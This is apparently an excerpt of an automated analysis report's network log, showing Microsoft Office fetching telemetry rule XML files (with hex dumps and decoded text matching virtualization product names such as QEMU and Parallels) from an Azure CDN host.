                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                        x-ms-request-id: f6fadb53-501e-0064-5acb-451f54000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125341Z-1746fd949bd7wvgbhC1EWR0rgs00000001ag000000004hcv
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:41 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        80192.168.2.74980613.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:41 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:42 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 470
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                        x-ms-request-id: 8c60988c-801e-00a3-08c1-457cfb000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125342Z-1746fd949bd6zq92hC1EWRry4800000001600000000079vu
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:42 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        81192.168.2.74980813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:42 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:42 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 502
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                        x-ms-request-id: b51b559c-801e-008c-7fcc-457130000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125342Z-1746fd949bddgsvjhC1EWRum2c00000001fg000000007t4h
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:42 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        82192.168.2.74980713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:42 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:42 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                        x-ms-request-id: 1a0f4f93-001e-0049-61cb-455bd5000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125342Z-1746fd949bd9x4mhhC1EWRb76n000000018g00000000747x
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:42 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        83192.168.2.74981013.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:43 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:43 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                        x-ms-request-id: 859db5fc-901e-005b-23cb-452005000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125343Z-1746fd949bdjzh7thC1EWR3g6400000001b000000000339k
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:44 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        84192.168.2.74980913.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:44 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:44 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                        x-ms-request-id: 7057cc02-501e-008f-16cc-459054000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125344Z-1746fd949bd2cq7chC1EWRnx9g00000000sg00000000apdd
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:44 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        85192.168.2.74981113.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:44 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:44 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 408
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                        x-ms-request-id: 68175a90-d01e-0065-3ed1-45b77a000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125344Z-1746fd949bd2cq7chC1EWRnx9g00000000z00000000016b9
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:44 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        86192.168.2.74981213.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:44 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:44 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 469
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                        x-ms-request-id: bcf9f347-101e-007a-60d2-45047e000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125344Z-1746fd949bdqpttnhC1EWRe1wg00000000w000000000atqw
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:45 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        87192.168.2.74981313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:44 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:44 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 416
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                        x-ms-request-id: 2aa810bc-801e-008f-63c1-452c5d000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125344Z-1746fd949bdwt8wrhC1EWRu6rg00000001e0000000003rkb
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:45 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        88192.168.2.74981413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:45 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:46 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                        x-ms-request-id: 26f79bf1-901e-0083-7ec4-45bb55000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125346Z-1746fd949bd9x4mhhC1EWRb76n00000001b0000000002uq0
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:46 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
